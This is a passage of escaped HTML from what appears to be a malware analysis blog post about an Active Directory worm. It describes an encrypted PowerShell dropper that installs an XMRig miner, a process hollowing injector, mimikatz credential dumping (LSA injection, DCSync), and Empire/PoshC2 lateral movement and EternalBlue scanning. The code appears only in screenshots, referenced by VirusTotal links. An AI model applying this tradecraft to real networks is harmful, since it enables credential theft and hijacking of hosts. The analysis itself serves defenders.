        sizes=&quot;(max-width: 801px) 100vw, 801px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The payload is a classic base64 powershell encoded command as shown in the screenshot.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Payload delivery&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;The payload served by the domain controller and the C&amp;#x26;C is a powershell module encrypted with TripleDES and ciphermode CBC:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1026px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/442d859cc43f6f5cd60cc97ccc0487cc/eb3fa/ADworm6.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 39.84375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAA/UlEQVR42oWQ4XKDIBCEfRATQSAohwqooEmn7/9Y3SNp/qQzXXHcAZf77hpy5L2f8BKN40jklFLdf7pWNUQ0eQrzXA3fEmMYrMXZ5UNt277c9cLho5Qj56Pkx/3E+v56xBCstQbS5lYFA8FgH1xG615KDud929Z1TankDFPyDo8WwhJAURshJKUQCMi+F0JIPJ3g8L5y+DxPhPO2YaGyJ3ergWdvL2ambt8tcDgsy/08UggpRUBw29PkoHFgcK2ZtpIPdsAs4MeBDfaanUstskqpHpMEmOg6Cbi/JH738WeTYsSa67QXfCYPFnIOFxsuy2ODeVJopZiFx2ekFD939UjmOUok1wAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm6&quot;
        title=&quot;&quot;
        src=&quot;/website/static/442d859cc43f6f5cd60cc97ccc0487cc/eb3fa/ADworm6.png&quot;
        srcset=&quot;/website/static/442d859cc43f6f5cd60cc97ccc0487cc/804b2/ADworm6.png 384w,
/website/static/442d859cc43f6f5cd60cc97ccc0487cc/e5715/ADworm6.png 768w,
/website/static/442d859cc43f6f5cd60cc97ccc0487cc/eb3fa/ADworm6.png 1026w&quot;
        sizes=&quot;(max-width: 1026px) 100vw, 1026px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/199a3b07d2e87660fec421c2af0fe2f11b1879bbb5038e87a186fd2acf039018/detection&quot;&gt;agen.ps1 sample&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The module and the function de is called, the password and the salt are passed as parameters to the function:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1400px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/957a3c432efb6e37740033911698803c/2cefc/ADworm7.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 10.677083333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAV0lEQVR42iWLyxGAQAxCrcR8CNmsenLsvzazemHgAZvs+8hxVl7p18AkOk5GhZF5lz1TK/P42oauEqbp2mYTEYLh1gimdA3YUle4FbRCCUusQw/+M5eXFxaEELjc1YVuAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm7&quot;
        title=&quot;&quot;
        src=&quot;/website/static/957a3c432efb6e37740033911698803c/2cefc/ADworm7.png&quot;
        srcset=&quot;/website/static/957a3c432efb6e37740033911698803c/804b2/ADworm7.png 384w,
/website/static/957a3c432efb6e37740033911698803c/e5715/ADworm7.png 768w,
/website/static/957a3c432efb6e37740033911698803c/2cefc/ADworm7.png 1400w&quot;
        sizes=&quot;(max-width: 1400px) 100vw, 1400px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The result is a powershell dropper.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Dropping malware components&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;The powershell dropper is a base64 blob of data containing multiple components:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1357px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/c17790147aafed6f0055423fc6735228/fbfd6/ADworm8.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 11.71875%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAASUlEQVR42i2KWw4AIQgDvYmGhx9b4P7H2ypOApm0HfhQGZUJIAJVSc+gov/ebmbn1Bq9iMhoY+d+Fj1lcTYiKrqJPyhM5prr8gNydxHFi/fR3wAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm8&quot;
        title=&quot;&quot;
        src=&quot;/website/static/c17790147aafed6f0055423fc6735228/fbfd6/ADworm8.png&quot;
        srcset=&quot;/website/static/c17790147aafed6f0055423fc6735228/804b2/ADworm8.png 384w,
/website/static/c17790147aafed6f0055423fc6735228/e5715/ADworm8.png 768w,
/website/static/c17790147aafed6f0055423fc6735228/fbfd6/ADworm8.png 1357w&quot;
        sizes=&quot;(max-width: 1357px) 100vw, 1357px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/b521e67ca56d253f0750a28919c9de2a39dbaefa0c429f661f52cd1d98a0f3f2/detection&quot;&gt;rein.ps1 sample&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Once the content has been decoded, the malware could drop one or more of the following components:&lt;/p&gt;
&lt;p&gt;a) An XMRig cryptominer:&lt;/p&gt;
&lt;p&gt;A simple XMRIG cryptominer which does not appear to be installed on domain controllers nor on low-performing hosts ( 32bit ).&lt;/p&gt;
&lt;p&gt;To make the cryptominer work at its best the attacker disables sleep mode, standby and hibernation via powercfg. It also checks via netstat if there are connections from other previous versions of the cryptominer and stops the processes that make them.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1354px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/3e687ecbeebfe6042a48be2d2e4e5064/307e7/ADworm9.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 31.510416666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAIAAABM9SnKAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAvElEQVR42k2PCw6EIAxEOchCS6uC/NTs/e+2U1kTB0JKodNX12odvWEdY7RW5VGckqiiKoKNGHlV5cjhlqvjO47rPDtcyr6nlHJOpSDMpVi8rsusETOS5V28rTnnvuWqyxpe8vP0/vPxb83bfHZM1OvVx4mW8CciBiyTRIZu8MgzKWhJSM8UtiMKZS99VKAmwwbJtgEu4mvErGo2ZMOr1ZiLTiN2sEcQiQNZV7YuFAL58HD7ZxD/H8eob+wfxlMwTbK3ey8AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm9&quot;
        title=&quot;&quot;
        src=&quot;/website/static/3e687ecbeebfe6042a48be2d2e4e5064/307e7/ADworm9.png&quot;
        srcset=&quot;/website/static/3e687ecbeebfe6042a48be2d2e4e5064/804b2/ADworm9.png 384w,
/website/static/3e687ecbeebfe6042a48be2d2e4e5064/e5715/ADworm9.png 768w,
/website/static/3e687ecbeebfe6042a48be2d2e4e5064/307e7/ADworm9.png 1354w&quot;
        sizes=&quot;(max-width: 1354px) 100vw, 1354px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/5a0ec41eb3f2473463b869c637aa93fac7d97faf0a8169bd828de07588bd2967/detection&quot;&gt;sample&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;b) A &lt;a href=&quot;https://github.com/hasherezade/libpeconv&quot;&gt;libpeconv&lt;/a&gt; based Process Hollowing injector&lt;/p&gt;
&lt;p&gt;This component is never dropped on domain controllers,&lt;/p&gt;
&lt;p&gt;It was used to write the XMRig into the  schtasks.exe process usually spawned by wmiprvse.exe.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/0a1cdc92bbb77c897723f21a376213480fd3484e45bda05aa5958e84a7c2edff/detection&quot;&gt;sample&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;c) Re-compiled mimikatz DLL to perform Credential Access:&lt;/p&gt;
&lt;p&gt;This component is installed on all hosts. We saw it running on the domain controller for the following steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://adsecurity.org/?page_id=1821&quot;&gt;Inject LSA&lt;/a&gt; to dump NTDS.dit credentials&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://adsecurity.org/?p=4056&quot;&gt;DCSync&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1351px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/2b3942bd9dc5d39970f2925b93cc5720/6edca/ADworm10.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 48.4375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABKklEQVR42o1Q2W7DMAzzh9SHfMhXfDQN0nYbiv3/V01O1nZ92DCCCRjYYiiymKdSYulLyN1iMBgsRqJxXgjBORcDfOND8O1IsOXttpzX9XpprVgD2+1BKQWoASlfqWBQKg2K9fNnW9blvFyurVVKUac6l3YKIaJziKiNVRo3OtAIxoMJxrgUHEuYc51z6fXYYvJS7d5qDza4J+GH1+TjYTl1tBGUpBhaCSU4SL45AEihlaQ3WSlNklZ5tDDA1rfbx/sy99RK7q3mqaaUY8wkYvClNvpMpKcW0WgA2uI5HEKmwq1D7x0tSWegrTZ0T1mgyoAL+p+8Zx7qOUxhUjn2+dRqiWi992RkrbFGW1C0jvgdjCyjz73Oxrl7Tzu+2/prmIKNgQP/2cQ/8QUa0lIAEMZspQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm10&quot;
        title=&quot;&quot;
        src=&quot;/website/static/2b3942bd9dc5d39970f2925b93cc5720/6edca/ADworm10.png&quot;
        srcset=&quot;/website/static/2b3942bd9dc5d39970f2925b93cc5720/804b2/ADworm10.png 384w,
/website/static/2b3942bd9dc5d39970f2925b93cc5720/e5715/ADworm10.png 768w,
/website/static/2b3942bd9dc5d39970f2925b93cc5720/6edca/ADworm10.png 1351w&quot;
        sizes=&quot;(max-width: 1351px) 100vw, 1351px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/9a1f8f15556021c071d145bdd1009c2115c6448670e75c72ee68afb1a47161a6/detection&quot;&gt;sample&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;d) The powershell script funs.ps1: &lt;a href=&quot;https://www.virustotal.com/gui/file/1ee6bff4ddfdfbec0738056421918b5f123e70881af15a6f85d4643ad9321ff0/detection&quot;&gt;uns_decoded.ps1&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This component is downloaded to any host, but with different functions.&lt;/p&gt;
&lt;p&gt;By default it contains ReflectivePEInjection and Lateral Movements capabilities from &lt;a href=&quot;https://github.com/EmpireProject/Empire&quot;&gt;Empire&lt;/a&gt; and &lt;a href=&quot;https://github.com/nettitude/PoshC2&quot;&gt;PoshC2&lt;/a&gt; projects for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;1.Remote Service Creation (aka SMBExec) &lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1068px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/43e27902c9f64dd633d0125f137f788d/d53ff/ADworm11.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 52.60416666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABHklEQVR42pWR2XKEIBBF+Y9BZFNAFAcXVDSJcbK8JP//O2nHeZ94q7soqrhd5zbIWlUUOWecciWNd9OX92UmeZIk5JmQEFwIRikjJCHgwCBC0nS/PjXPiw+D75Zv186mGqvrUNRzGz+NazG+JLvwXhjvJww8+s6F1q2fX/ph/fHjm64X3wTfx2m9Nd2QSy4ylSmT6UIVTmnNAJGyNGWUccBD20eYl254//Xjqt3S9UOYxvi6VLWHddjSaltq66yrbWmUynKlmTQwC/xoinUX6ibeqmbKy2BdZ1xs46aLAtI/sPGd/AF77wObiQwAEnw5whwFT8k/hOw1QCTKBBQ5KSRzw4WkXBIqT5tN1TDGYY0ZT0+bRW7gPzgXuWBnzX+05lu4F64QIAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm11&quot;
        title=&quot;&quot;
        src=&quot;/website/static/43e27902c9f64dd633d0125f137f788d/d53ff/ADworm11.png&quot;
        srcset=&quot;/website/static/43e27902c9f64dd633d0125f137f788d/804b2/ADworm11.png 384w,
/website/static/43e27902c9f64dd633d0125f137f788d/e5715/ADworm11.png 768w,
/website/static/43e27902c9f64dd633d0125f137f788d/d53ff/ADworm11.png 1068w&quot;
        sizes=&quot;(max-width: 1068px) 100vw, 1068px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;2.WMI Win32_Process Remote Process Creatio &lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1059px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/f35d74ffb2ed1509352a203005fa3a78/1be7e/ADworm12.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 48.958333333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABGUlEQVR42o2Q607DMAyF+x5r1kt8id02bSXSjU1sY/uDBO//PLgtIPizcXQUHUtx4s/ZOKZh7KYpxihVVeZ5vnW5M1t4pKwLEgSIuYZQeao9mj0Gj1wUxYNmUb7e0vPxsLu89+ncjsem38d0210+MGi+2cy33HK41W6Oi7K21dfr0+7wnE5vMZ10OKZpSoeX/encdDEIBiZEBEBVIkJRG0qQO5Y2q+uK2SMRkHrg2pMHRBZAKMptsWhbrKH8Li3OOQsSSQdLLt+4dVWm3Bbm/gIu8/4qZ2Yg4aY3PFtYWeEX3/+UVWATGomZtFmsJIKG4x69k2GFrUTpBtbOztD0oYnW+QN4t7kG9YFCB8AUWmDF0K4Oysxw5/9Pq6FTRSHdOPkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm12&quot;
        title=&quot;&quot;
        src=&quot;/website/static/f35d74ffb2ed1509352a203005fa3a78/1be7e/ADworm12.png&quot;
        srcset=&quot;/website/static/f35d74ffb2ed1509352a203005fa3a78/804b2/ADworm12.png 384w,
/website/static/f35d74ffb2ed1509352a203005fa3a78/e5715/ADworm12.png 768w,
/website/static/f35d74ffb2ed1509352a203005fa3a78/1be7e/ADworm12.png 1059w&quot;
        sizes=&quot;(max-width: 1059px) 100vw, 1059px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt; &lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1336px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/0025612e57055025d1325cef6ebf5134/9685e/ADworm13.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 51.5625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABKUlEQVR42nVSi27DMAjMhyx+Y8B2Ho3Uafv/H9uRtmqmaSdkMLHhLngi1qaiTMqFKXPJlGOOoaSAFUYpUDZDBnGxjB1I0U9dxtiPUmsp0RCC9+5jnmF/cSbd05ybuPKyHlU7EaFtyckHw2MNr/i5jdGh9gsT0vtx//y+a6NaYajGuWqBYync4avgmwgLcfMhOut6Xgb5dbtt+yaq2sdY+jp6V12a9KattVprJgGvQuyt7fzunGIsMePvgI+x83bAu/lBDsEVpvWCCWXRuY1BtUAz4K2C2ak2nnIjgmg++atmbJbt9vkFzaaSjb1W6SxyBgMZbDFRgOS3Zsxs3Y91Xe1wM82jN0x+aQzlXU1zwgsgPIBqNy7MJ/BKPmWf5nd2du490P8EO+d+ANvRUb1QWYLrAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm13&quot;
        title=&quot;&quot;
        src=&quot;/website/static/0025612e57055025d1325cef6ebf5134/9685e/ADworm13.png&quot;
        srcset=&quot;/website/static/0025612e57055025d1325cef6ebf5134/804b2/ADworm13.png 384w,
/website/static/0025612e57055025d1325cef6ebf5134/e5715/ADworm13.png 768w,
/website/static/0025612e57055025d1325cef6ebf5134/9685e/ADworm13.png 1336w&quot;
        sizes=&quot;(max-width: 1336px) 100vw, 1336px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;3.Remote Task Scheduler Creation&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1337px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/81d4725f28589678c692e2e206838041/3f8aa/ADworm14.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 53.90625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABFUlEQVR42pVRCW4DIQzcj2TBJ7BgNkc3afr/h9UkUXpIlZrRMBqQbWR7ElFNyQ8jhADzK5ggghARC4sS62vJCECAIQ6EEHfzPLgbesfd/+Du8Tj5r6moKiX/GGkUiAFjiGEe3juJAW76vOKNbjwZr/v23vN1zR9rOptupteej4ucWtosXcwf0/vNDPYR0zNTjBNB3Kq8VdmauDnZcrJyabq1UeVi+kzzGEtU2GcUGUaTEyJve7NautlhtUNf1pqdNXEW9B0sgou6JxFBVkAO8xwcc5hihH1vq1kq5jUOVVopIjkC/h5ueOBr2j63lvh8bJpyyaVmWZYiKSPJ97g/9gygzCouQghEo5v/7pmQmF0IcchLyZ/z8FobUx5+cwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm14&quot;
        title=&quot;&quot;
        src=&quot;/website/static/81d4725f28589678c692e2e206838041/3f8aa/ADworm14.png&quot;
        srcset=&quot;/website/static/81d4725f28589678c692e2e206838041/804b2/ADworm14.png 384w,
/website/static/81d4725f28589678c692e2e206838041/e5715/ADworm14.png 768w,
/website/static/81d4725f28589678c692e2e206838041/3f8aa/ADworm14.png 1337w&quot;
        sizes=&quot;(max-width: 1337px) 100vw, 1337px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt; This last method leaks the credentials in the commandline twice.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;4.Simple TCP scanner &lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 697px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/e838a0f5f69897d7b41492b8bba2e8b4/7422e/ADworm15.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 80.98958333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAIAAACZeshMAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABu0lEQVR42o2TWY7bMAyGc4/YWkiJErXbqTODYB56/1OV8jQF2k7RELTNl4/LT/riuVtXPFGp4iEEimVP/R5SdSFx3a01y7quSq3zc0bTtDwXACCuud8pdUe+Vhoj5kIcudXWai059VYSx15rKxkRluW6zkzLRWvjiEPq4Ag9ScHAJUTKOTCTeIg55O5DppjELQaLZJEB/cUYI5VTu3mKkiKNg8solbct9cG1xdJ62W557LGMkDf0J+8yoJPKmmZZ7/yEndRjaC3WOj0laj3m5CWLDwy+AuLZ9uz8YrTx1sl0fTva8ZGZg0etnqbVT4FW9budgknbDnCUb3W7y8jRQaIJT1mf4p7hX/gnbLU99mOMW65p22uMBGidQ5FQxrHWAgIRys6+gJd1Ye7H4/vt7ePtcX9/H2MwJ+ZyE50R8ZycvYdfW37Cepoz0Ou+H4/at+CwBHc2vpx+Rssf4AkLqbRGwJ52GRvmQpGliPq/zbZFUa0WbQy4oAx4sA7Ma7C1MXeWI4mZCGoJopA0qV6B55F4UafJnclNh+Ct0eo1O8/TuGi93JZoqw18ocy/YPmrlk8t5XW9qpdJpdQPlfKEfEPPA3YAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm15&quot;
        title=&quot;&quot;
        src=&quot;/website/static/e838a0f5f69897d7b41492b8bba2e8b4/7422e/ADworm15.png&quot;
        srcset=&quot;/website/static/e838a0f5f69897d7b41492b8bba2e8b4/804b2/ADworm15.png 384w,
/website/static/e838a0f5f69897d7b41492b8bba2e8b4/7422e/ADworm15.png 697w&quot;
        sizes=&quot;(max-width: 697px) 100vw, 697px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;5.EternalBlue Scanner &lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 881px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/f25998e4c90be895327c7c2f08e1b1ef/96658/ADworm16.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 75%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAIAAABr+ngCAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABq0lEQVR42oVTCY7bMAzMP2LZlizroKjDR+Isshu0+/9H7chp0BRNtwQhSIKGHA6pg9JO+0XbVKYQSwn5NG8bBadUPwxSKan1IKXsXtmh77tBW4CV4cGwI0YEYmL2Mfo8h5S8UkoI0f5lh17KVjSj8ZQ3ZiQ+hxRDWT0nYw2xR4aXyAoGJdEcHU88ga2fTjEvMc3M2Tuy7bdWwU1zpFrqzzKl7WPlHEIizpTmKFXfim/BQjSGEvDO27JG64waVA+TPV6IJ3tN28cln95j5vP7sn2cPLuu76SqaiNQdWy0knu4FzWn9coxXG4rwGVNwIM8RX9fKToUYr15zn8Hg3YOO+04cVkykhyPDe4fJqrXG/EPwS4/ypQvt9P1842Sx+t9EFp4u/uv/UvBQkFmN28Fag/jUOl17f9bdRcsLVdOYb1MqBDygCSSiyd/FPC4EeI3uJxvqdQ+xyl4xoRgvJwli1iYFjgktN5aMpANR2ww2xL0tNJBk/MMBNqLmUWX6gob9o7J2jOUM+jdRxzUoe86VT9GVNqrMTrClzAUDNFYivdkQrA4cnTOjeJP+wK/0YB7ejbXrwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm16&quot;
        title=&quot;&quot;
        src=&quot;/website/static/f25998e4c90be895327c7c2f08e1b1ef/96658/ADworm16.png&quot;
